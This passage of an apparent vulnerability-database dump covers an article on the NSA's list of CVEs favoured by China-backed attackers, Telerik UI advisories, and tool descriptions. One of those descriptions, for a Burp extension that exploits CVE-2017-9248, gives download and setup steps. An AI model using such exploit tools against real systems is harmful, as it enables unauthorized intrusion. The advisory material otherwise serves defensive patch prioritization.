Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. 
In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP 8 proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches for the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. 
An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. 
An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. 
It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: one in the Exim mail transfer agent (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. 
\u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "cvss3": {}, "published": "2020-10-21T20:31:17", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "cvelist": ["CVE-2014-4958"], "description": "\r\n\r\nAll versions of the popular UI for ASP.NET AJAX RadEditor Control product by Telerik may be affected by a high-risk stored attribute-based cross-site scripting (XSS) vulnerability that is assigned CVE-2014-4958. This WYSIWYG rich text editor is \u201c...what Microsoft chose to use in MSDN, CodePlex, TechNet, MCMS and even as an alternative to the default editor in SharePoint.\u201d\r\n\r\nPersonally tested and confirmed are versions: 2014.1.403.35 (much newer) and 2009.3.1208.20 (much older) using Internet Explorer 8, version 8.0.7601.17514. However, all versions from Telerik at this time may be vulnerable and will continue to be until a patch is released. 
A workaround may be available.\r\n\r\nMore information on the vulnerability: http://maverickblogging.com/disclosing-cve-2014-4958-stored-attribute-based-cross-site-scripting-xss-vulnerability-in-telerik-ui-for-asp-net-ajax-radeditor-control/\r\n\r\nRemediation: Telerik states: We have applied a patch to the editor that will be delivered with our Q3 edition of the controls that should be released towards the end of October. A blog post on the issue has been published here: http://blogs.telerik.com/blogs/14-09-24/securing-radeditor-content-and-preventing-xss-attacks\r\n\r\nAdditional credit goes to Tyler Hoyle and the rest of my team in CGI Federal\u2019s Emerging Technologies Security Practice for their hard work.\r\n\r\n", "edition": 1, "modified": "2014-10-14T00:00:00", "published": "2014-10-14T00:00:00", "id": "SECURITYVULNS:DOC:31198", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31198", "title": "CVE-2014-4958: Stored Attribute-Based Cross-Site Scripting (XSS) Vulnerability in Telerik UI for ASP.NET AJAX RadEditor Control", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2021-06-08T18:46:26", "description": "PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2014-10-14T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-4958", "CVE-2014-5450", "CVE-2014-4737", "CVE-2014-5516", "CVE-2014-5375", "CVE-2014-7138", "CVE-2014-5258", "CVE-2014-6035", "CVE-2014-4735", "CVE-2014-6300", "CVE-2014-4954", "CVE-2014-4986", "CVE-2014-0103", "CVE-2014-5447", "CVE-2014-6034", "CVE-2014-4955", "CVE-2014-5451", "CVE-2014-5259", "CVE-2014-4348", "CVE-2014-4349", "CVE-2014-6036", "CVE-2014-7217", "CVE-2014-6243", "CVE-2014-6242", "CVE-2014-5376", 
"CVE-2014-1608", "CVE-2014-5273", "CVE-2014-5300", "CVE-2014-6315", "CVE-2014-5297", "CVE-2014-5449", "CVE-2014-5448", "CVE-2014-5460", "CVE-2014-4987", "CVE-2014-7295", "CVE-2014-1609", "CVE-2014-5274", "CVE-2014-7139", "CVE-2014-5298"], "modified": "2014-10-14T00:00:00", "id": "SECURITYVULNS:VULN:14008", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14008", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "veracode": [{"lastseen": "2022-07-27T10:08:23", "description": "telerik is vulnerable to information disclosure. A cryptographic weakness can be exploited to discover the encryption keys (Telerik.Web.UI.DialogParametersEncryptionKey and/or the MachineKey).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-25T09:14:10", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2022-04-19T18:14:44", "id": "VERACODE:25766", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25766/summary", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-27T10:08:22", "description": "telerik.web.ui allows unrestricted file uploads. A remote attacker is able to upload arbitrary files which can result in arbitrary code execution.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-25T08:38:28", "type": "veracode", "title": "Unrestricted File Upload", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317"], "modified": "2020-10-21T01:10:10", "id": "VERACODE:25764", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25764/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-27T10:08:23", "description": "telerik.web.ui is vulnerable to insecure direct object reference. User input is not validated and used directly by `RadAsyncUpload` without modification or validation. 
This can potentially result in arbitrary file uploads and execution of arbitrary code.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-25T08:57:24", "type": "veracode", "title": "Insecure Direct Object Reference", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11357"], "modified": "2022-04-19T18:11:55", "id": "VERACODE:25765", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25765/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-27T10:08:23", "description": "telerik is vulnerable to remote code execution. 
A .NET JavaScriptSerializer Deserialization vulnerability through `RadAsyncUpload` allows an attacker to execute malicious code on the server in the context of the `w3wp.exe` process.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-25T09:22:09", "type": "veracode", "title": "Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2020-10-21T01:12:00", "id": "VERACODE:25767", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25767/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Telerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 
"HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Telerik UI for ASP.NET AJAX and Progress Sitefinity Cryptographic Weakness Vuln", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2017-9248", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Telerik.Web.UI in Progress Telerik UI for ASP.NET AJAX allows remote attackers to perform arbitrary file uploads or execute arbitrary code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T00:00:00", "type": "cisa_kev", "title": "Telerik UI for ASP.NET AJAX Unrestricted File Upload Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317"], "modified": "2022-04-11T00:00:00", "id": "CISA-KEV-CVE-2017-11317", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Contains a .NET deserialization vulnerability in the RadAsyncUpload function that can result in remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Progress Telerik UI for ASP.NET deserialization bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-18935", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2022-04-07T12:04:34", "description": "A [Burp](<https://www.kitploit.com/search/label/Burp>) 
extension to detect and exploit versions of Telerik Web UI [vulnerable](<https://www.kitploit.com/search/label/Vulnerable>) to [CVE-2017-9248](<https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness>). This extension is based on the original exploit tool written by Paul Taylor ([@bao7uo](<https://twitter.com/bao7uo>)) which is available at <https://github.com/bao7uo/dp_crypto>. Credits and big thanks to him.\n\nA related blog post on how to exploit web applications via Telerik Web UI can also be found [here](<https://capt-meelo.github.io/pentest/2018/08/03/pwning-with-telerik.html>).\n\n \n\n\n**Features**\n\n * Detect vulnerable versions of Telerik Web UI during passive scans.\n * Bruteforce the key and [discover](<https://www.kitploit.com/search/label/Discover>) the \"Document Manager\" link just like the original exploit tool.\n \n**Screenshots** \n \n\n\n[](<https://1.bp.blogspot.com/-VVhTSzqz9Cg/W345gZPWdII/AAAAAAAAMNM/DYMQdFbzzUwRMB4Lum2Rp7yglrPmtL3NQCLcBGAs/s1600/Telewreck_4_01.png>)\n\n \n \n\n\n[](<https://2.bp.blogspot.com/-1u6YS-1j5jA/W345ga46WZI/AAAAAAAAMNQ/Gfz3F1w5dOkGwVNa5yVJ8lwbBBWg5Hb5wCLcBGAs/s1600/Telewreck_5_02.png>)\n\n \n \n \n**Installation** \n\n\n 1. Download [telewreck.py](<https://raw.githubusercontent.com/capt-meelo/Telewreck/master/telewreck.py>) to your machine.\n 2. Install Python's **requests** module using `sudo pip install requests`.\n 3. On your Burp, go to _**Extender > Options**_ tab. Then under the **Python Environment** section, locate your **jython-standalone-2.7.0.jar** file (1) and the directory where Python's requests module is located (2).\n\n[](<https://2.bp.blogspot.com/-lgIeGL7t1Gc/W345u6KrAXI/AAAAAAAAMNU/5Oi5urXnCGkUxLIiVDdXSjweiOh7DvNvgCLcBGAs/s1600/Telewreck_6_03.png>)\n\n 4. Go to _**Extender > Extensions**_ tab, then click on the _**Add**_ button. 
On the new window, browse the location of **telewreck.py** and click the _**Next**_ button.\n\n[](<https://3.bp.blogspot.com/-zlyBCAkR9No/W345zzYeEuI/AAAAAAAAMNg/cWjXp666zpUmIk-5P1Eh8xUceEY4A7nRwCLcBGAs/s1600/Telewreck_7_04.png>)\n\n 5. If there's any error, the **Telewreck** tab would appear in your Burp.\n\n[](<https://1.bp.blogspot.com/--UhicVODu2Y/W3454iq9cVI/AAAAAAAAMNk/emXEyqmmbTcdDkubYkjp2rWvENjyQSUngCLcBGAs/s1600/Telewreck_8_05.png>)\n\n \n**Notes** \n\n\n 1. This extension requires Python's **requests** module. Just run `pip install requests` to install it.\n 2. The text area under Telewreck tab doesn't function as a console. So, `stdout` and `stderr` outputs cannot be seen there. However, you can view them under the **Output** and **Errors** sections of the **Extender** tab.\n 3. Before running another bruteforce, cancel the current process first by clicking the **Cancel** button.\n 4. If the key can't be bruteforced, then probably the key has been set up securely and/or the application is not using a default installation of Telerik.\n 5. 
If the key can't be bruteforced and/or there are some issues, it's recommended to fall back to the original exploit tool.\n \n \n\n\n**[Download Telewreck](<https://github.com/capt-meelo/Telewreck>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-29T13:33:00", "type": "kitploit", "title": "Telewreck - A Burp Extension To Detect And Exploit Versions Of Telerik Web UI Vulnerable To CVE-2017-9248", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2018-08-29T13:33:20", "id": "KITPLOIT:8244477187189155516", "href": "http://www.kitploit.com/2018/08/telewreck-burp-extension-to-detect-and.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-07T12:04:59", "description": "[](<https://2.bp.blogspot.com/-Y6JS7G2qSEY/WYE0RzV5iPI/AAAAAAAAIcE/a0xxwoL0lgkMobeo94eAZ5KYEbGRcelOwCLcBGAs/s1600/nmap.png>)\n\n \n\n\nNmap (\"Network Mapper\") is a free and open source utility for network discovery and security auditing. 
Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer ([Zenmap](<https://nmap.org/zenmap/>)), a flexible data transfer, redirection, and debugging tool ([Ncat](<https://nmap.org/ncat/>)), a utility for comparing scan results ([Ndiff](<https://nmap.org/ndiff/>)), and a packet generation and response analysis tool ([Nping](<https://nmap.org/nping/>)).\n\n \n\n\nNmap was named \u201cSecurity Product of the Year\u201d by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in [twelve movies](<https://nmap.org/movies/>), including [The Matrix Reloaded](<https://nmap.org/movies/#matrix>), [Die Hard 4](<https://nmap.org/movies/#diehard4>), [Girl With the Dragon Tattoo](<https://nmap.org/movies/#gwtdt>), and [The Bourne Ultimatum](<https://nmap.org/movies/#bourne>).\n\n \n\n\n**Features**\n\n * **Flexible**: Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many [port scanning](<https://nmap.org/book/man-port-scanning-techniques.html>) mechanisms (both TCP & UDP), [OS detection](<https://nmap.org/book/osdetect.html>), [version detection](<https://nmap.org/book/vscan.html>), ping sweeps, and more. 
See the [documentation page](<https://nmap.org/docs.html>).\n * **Powerful**: Nmap has been used to scan huge networks of literally hundreds of thousands of machines.\n * **Portable**: Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.\n * **Easy**: While Nmap offers a rich set of advanced features for power users, you can start out as simply as \"nmap -v -A _targethost_\". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source.\n * **Free**: The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for [free download](<https://nmap.org/download.html>), and also comes with full source code that you may modify and redistribute under the terms of the [license](<https://nmap.org/data/COPYING>).\n * **Well Documented**: Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages [here](<https://nmap.org/docs.html>).\n * **Supported**: While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the [Nmap mailing lists](<https://nmap.org/#lists>). Most bug reports and questions should be sent to the [nmap-dev list](<http://seclists.org/nmap-dev>), but only after you read the [guidelines](<https://nmap.org/book/man-bugs.html>). We recommend that all users subscribe to the low-traffic [nmap-hackers](<http://seclists.org/nmap-hackers>) announcement list. You can also find Nmap on [Facebook](<https://facebook.com/nmap>) and [Twitter](<https://twitter.com/nmap>). 
For real-time chat, join the #nmap channel on [Freenode](<https://freenode.net/>) or [EFNet](<http://www.efnet.org/>).\n * **Acclaimed**: Nmap has won numerous awards, including \"Information Security Product of the Year\" by Linux Journal, Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the [press page](<https://nmap.org/nmap_inthenews.html>) for further details.\n * **Popular**: Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (out of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities.\n\n \n\n\n**Changelog**\n\n \n\n \n \n Here is the full list of significant changes:\n \n \u2022 [Windows] We made a ton of improvements to our Npcap Windows packet\n capturing library (https://nmap.org/npcap/) for greater performance and\n stability, as well as smoother installer and better 802.11 raw frame\n capturing support. Nmap 7.70 updates the bundled Npcap from version 0.93 to\n 0.99-r2, including all these changes from the last seven Npcap releases:\n https://nmap.org/npcap/changelog\n \n 